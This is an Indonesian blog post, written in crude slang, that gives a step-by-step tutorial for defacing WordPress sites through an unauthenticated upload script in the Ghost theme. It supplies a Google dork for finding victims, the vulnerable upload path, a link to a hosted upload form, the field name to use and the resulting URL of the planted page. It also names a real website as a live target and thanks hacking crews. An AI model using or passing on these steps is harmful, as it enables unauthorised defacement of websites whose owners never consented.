Assalamualaikum Wr.wb
Kembali Lagi Bersama saya Narumi X-ploit
Kali Ni Gw Akan Kasih Tutorial Deface Poc WP-GHOST
Deface Ini Memang Gampang Untuk di pahami
Ok Langsung aja
Bahan Bahan
-Air mineral
-Sc deface kesayangan abah:V
-CSRF
-POTO MANTAN :V
-Titid harus panjang:V
-DORK
-EXPLOIT
Untuk Dork ini Ae
-inurl:wp-content/themes/Ghost/
(EXPLOIT)
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Ok Cekidot Meki:V
Salin Dork nya Paste di Emak lu:V Ya di google Lah tod
Ok disini gw akan gunakan live target kasean ama lu nyarinya:V
http://www.simseklerdugunsarayi.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Itu live target nya ya asw
Sekrng kita Masukan Ke Csrf
Ga ada CSRF? NI GW SEDIAIN
http://subangcyberxploit.orgfree.com/
Tuh CSRF NYA oke jika sudah
perhatikan Gambar di bawah!!
Nah Kolom pertama isi Yg tadi Live targetnya
Yg kolom ke dua Isi dengan.....
Filedata
Jika sudah Klick
Kunci Target
Jika sudah Tinggal
Pilih File , masukan Sc deface Mbahmu
Lanjut Klick
Gass stah
jika sudah nanti Akan ada tulisan
{"status":"OK","imageID":"hmhtml","imageName":"hm.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\thm.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}
Nah tinggal kita panggil caranya?
http://www.simseklerdugunsarayi.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Nah Lu Hapus dari bagian /themes/Ghost
Ganti dengan
/uploads/settingsimages/nama sclu.html
Jadi gini
http://www.simseklerdugunsarayi.com/wp-content/uploads/settingsimages/hm.html
Hasil gan:) mau live target?
Cari ae sediri:V mandiri lol
THANK TO
-BIOHAZARD CYBER
-INDONESIAN DEATH SEC
-ANGELS CYBER MOON
-CYBER WHITE HAT
-DLL GRUP YG LAIN:)
SEE YOU NEX TIME ALL:)
2 komentar
Wasiap
Sip